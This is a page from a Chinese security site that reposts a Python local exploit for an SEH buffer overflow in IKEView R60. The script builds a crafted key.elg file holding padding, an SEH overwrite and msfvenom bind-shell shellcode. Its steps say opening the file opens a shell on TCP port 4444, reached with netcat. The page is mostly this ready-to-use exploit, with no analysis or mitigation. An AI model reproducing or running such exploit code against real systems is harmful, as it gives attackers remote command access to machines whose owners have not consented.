首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 IKEView R60 - Buffer Overflow Local Exploit (SEH) 来源：vfocus.net 作者：VIKRAMADITYA 发布时间：2015-09-18   #!/usr/bin/python # EXPLOIT TITLE: IKEView R60 Buffer overflow(SEH) Local Exploit # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: hyp3rlinx # Date of Testing: 17th September 2015 # Download Link : https://www.exploit-db.com/apps/e74a3dcf9bd8a2dd05026532fbf9bb36-IKEView.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called key.elg # Step 3: Open this file with IKEView.exe # That should open a bind tcp port at 4444 # Step 4: Connect with netcat at port 4444   file = open('key.elg'  , 'w');   # bad characters  - \x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20 buffer = "A"*4424 + "\xEB\x18\x90\x90" + "\xc0\x28\x40\x00" + "\x90" * 30   # msfvenom -p windows/shell_bind_tcp -b '\x09\x0a\x00\x0a\x0b\x0c\x0d\x0e\x0f\x20'  -f c   buffer += ("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3\x9f" "\x17\x99\x83\xeb\xfc\xe2\xf4\x5f\x77\x95\x99\xa3\x9f\x77\x10" "\x46\xae\xd7\xfd\x28\xcf\x27\x12\xf1\x93\x9c\xcb\xb7\x14\x65" "\xb1\xac\x28\x5d\xbf\x92\x60\xbb\xa5\xc2\xe3\x15\xb5\x83\x5e" "\xd8\x94\xa2\x58\xf5\x6b\xf1\xc8\x9c\xcb\xb3\x14\x5d\xa5\x28" "\xd3\x06\xe1\x40\xd7\x16\x48\xf2\x14\x4e\xb9\xa2\x4c\x9c\xd0" "\xbb\x7c\x2d\xd0\x28\xab\x9c\x98\x75\xae\xe8\x35\x62\x50\x1a" "\x98\x64\xa7\xf7\xec\x55\x9c\x6a\x61\x98\xe2\x33\xec\x47\xc7" "\x9c\xc1\x87\x9e\xc4\xff\x28\x93\x5c\x12\xfb\x83\x16\x4a\x28" "\x9b\x9c\x98\x73\x16\x53\xbd\x87\xc4\x4c\xf8\xfa\xc5\x46\x66" "\x43\xc0\x48\xc3\x28\x8d\xfc\x14\xfe\xf7\x24\xab\xa3\x9f\x7f" "\xee\xd0\xad\x48\xcd\xcb\xd3\x60\xbf\xa4\x60\xc2\x21\x33\x9e" "\x17\x99\x8a\x5b\x43\xc9\xcb\xb6\x97\xf2\xa3\x60\xc2\xf3\xab" "\xc6\x47\x7b\x5e\xdf\x47\xd9\xf3\xf7\xfd\x96\x7c\x7f\xe8\x4c" "\x34\xf7\x15\x99\xb2\xc3\x9e\x7f\xc9\x8f\x41\xce\xcb\x5d\xcc" "\xae\xc4\x60\xc2\xce\xcb\x28\xfe\xa1\x5c\x60\xc2\xce\xcb\xeb" "\xfb\xa2\x42\x60\xc2\xce\x34\xf7\x62\xf7\xee\xfe\xe8\x4c\xcb" "\xfc\x7a\xfd\xa3\x16\xf4\xce\xf4\xc8\x26\x6f\xc9\x8d\x4e\xcf" "\x41\x62\x71\x5e\xe7\xbb\x2b\x98\xa2\x12\x53\xbd\xb3\x59\x17" "\xdd\xf7\xcf\x41\xcf\xf5\xd9\x41\xd7\xf5\xc9\x44\xcf\xcb\xe6" "\xdb\xa6\x25\x60\xc2\x10\x43\xd1\x41\xdf\x5c\xaf\x7f\x91\x24" "\x82\x77\x66\x76\x24\xe7\x2c\x01\xc9\x7f\x3f\x36\x22\x8a\x66" "\x76\xa3\x11\xe5\xa9\x1f\xec\x79\xd6\x9a\xac\xde\xb0\xed\x78" "\xf3\xa3\xcc\xe8\x4c") file.write(buffer) file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·ZTE PC UI USB Modem Software - ·VBox Satellite Express 2.3.17. ·IKEView.exe R60 - .elg Local S ·Android libstagefright - Integ ·ManageEngine OpManager Remote ·Konica Minolta FTP Utility 1.0 ·MS15-078 Microsoft Windows Fon ·Wireshark 1.12.7 - Division by ·CMS Bolt File Upload Vulnerabi ·Total Commander 8.52 - Buffer ·MS15-100 Microsoft Windows Med ·Total Commander 8.52 - Buffer   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved